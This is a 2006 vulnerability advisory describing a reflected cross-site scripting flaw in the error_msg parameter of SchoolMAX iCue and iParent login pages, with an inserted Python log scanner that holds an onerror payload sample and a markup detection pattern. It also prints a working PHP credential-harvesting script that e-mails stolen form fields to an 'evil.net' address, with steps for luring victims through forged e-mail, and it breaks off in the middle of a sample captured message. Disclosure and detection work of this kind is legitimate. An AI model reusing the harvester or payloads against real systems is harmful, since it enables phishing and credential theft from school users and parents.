-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The InfoGuard Group Vulnerability Summary 2006-04
Application: Maximus' iCue and iParent (http://www.schoolmax.net)
Versions: All
Bugs: Cross-Site Scripting (XSS)
Date: 18 June 2006
Author: Charles H.
E-mail: charles@infoguardgroup.com
Website: http://www.infoguardgroup.com
1) Introduction
SchoolMAX from MAXIMUS is one of the most technologically advanced
student information systems available today. It is district-based yet
still provides for school-based management capabilities and controls.
http://www.maximus.com/corporate/pages/SchoolMAX.asp
2) Login XSS
The login.asp file associated with SchoolMAX's iCue and iParent applications
suffers from a Cross-Site Scripting flaw: the error_msg query parameter is
reflected into the page without encoding. This can result in cookie and/or
credential theft, especially when combined with a social engineering attack.
A simple attack against iCue might look like this:
https://icue.victimsite.us/toas/icue_login.asp?error_msg=These%20aren't%20the%20droids%20you're%20looking%20for
This will result in the message "These aren't the droids you're looking
for" being displayed.
This shows the basic idea of the XSS. You can perform various
obfuscation techniques to hide the message.
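As an added example (not part of the advisory), the following Python checks web-server access logs for requests to the two login pages whose error_msg parameter carries markup, and shows the HTML encoding the server should apply before reflecting the value. The log lines and client addresses are constructed.

```python
import re
from html import escape
from urllib.parse import urlsplit, parse_qs, unquote

# Login pages named in the advisory; error_msg is reflected into them unencoded.
LOGIN_PAGES = ("/toas/icue_login.asp", "/iparent/sv_login_secure.asp")
# Markup that a server-generated error_msg should never contain.
MARKUP = re.compile(r"[<>]|javascript:|\bon[a-z]+\s*=|&#", re.IGNORECASE)

# Constructed Common Log Format lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jun/2006:10:01:02 -0800] "GET /toas/icue_login.asp?error_msg=Invalid%20login. HTTP/1.1" 200 512
10.0.0.9 - - [18/Jun/2006:10:01:07 -0800] "GET /toas/icue_login.asp?error_msg=These%20aren't%20the%20droids HTTP/1.1" 200 530
10.0.0.7 - - [18/Jun/2006:10:02:11 -0800] "GET /iparent/sv_login_secure.asp?invalid_login=true&error_msg=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 601
10.0.0.7 - - [18/Jun/2006:10:02:40 -0800] "GET /iparent/home.asp?error_msg=%3Cb%3Ehi HTTP/1.1" 404 210
"""

REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def suspicious_error_msgs(log_text):
    """Return (client_ip, path, decoded error_msg) for requests to the login
    pages whose error_msg parameter contains HTML or script markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        url = urlsplit(target)
        if url.path not in LOGIN_PAGES:
            continue
        # parse_qs decodes once; decode a second time so a double-encoded
        # payload (%253C) is also caught.
        for msg in parse_qs(url.query).get("error_msg", []):
            if MARKUP.search(msg) or MARKUP.search(unquote(msg)):
                hits.append((ip, url.path, msg))
    return hits


def safe_error_msg(msg):
    """Server-side fix for the reflection: HTML-encode error_msg before it is
    written into the page (the ASP equivalent is Server.HTMLEncode)."""
    return escape(msg, quote=True)
```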
Additionally, when used in conjunction with social engineering, user
credentials can be easily obtained:
If we take a PHP file like this:
<?php
// Mailbox that receives the captured form fields (as given in the advisory).
$my_email = "h@x0r@evil.net";
// Genuine iParent login page the victim is sent back to afterwards.
$header = "https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR=";
if ($_SERVER['REQUEST_METHOD'] != "POST") { exit; }
// Reject characters that could be used for mail header injection.
$disallowed_name = array(':', ';', "'", '"', '=', '(', ')', '{', '}', '@');
foreach ($disallowed_name as $value) {
    if (stristr($_POST['Name'], $value)) { header("Location: " . $_SERVER['HTTP_REFERER']); exit; }
}
$disallowed_email = array(':', ';', "'", '"', '=', '(', ')', '{', '}');
foreach ($disallowed_email as $value) {
    if (stristr($_POST['Email'], $value)) { header("Location: " . $_SERVER['HTTP_REFERER']); exit; }
}
// Build the mail body from every submitted field; bail out if all are empty.
$message = "";
$set = 0;
foreach ($_POST as $key => $value) {
    if (!empty($value)) { $set = 1; }
    $message .= "$key: $value\n\n";
}
if ($set !== 1) { header("Location: " . $_SERVER['HTTP_REFERER']); exit; }
$message .= "-- \nThank you for exploiting iParent";
$message = stripslashes($message);
$subject = "FormToEmail Comments";
$headers = "From: " . $_POST['Email'] . "\n" . "Return-Path: " . $_POST['Email'] . "\n" . "Reply-To: " . $_POST['Email'] . "\n";
mail($my_email, $subject, $message, $headers);
// Redirect to the real login page showing an "Invalid login" message.
header("Location: " . $header);
?>
Host it somewhere, then send a forged e-mail that directs the victim to it;
the submitted credentials are captured. Here is what the attacker receives
in the e-mail:
Subject: FormToEmail Comments
Date: Mon, 06 Mar 2006 21:48:05 -0900 (AKST)
From: Nobody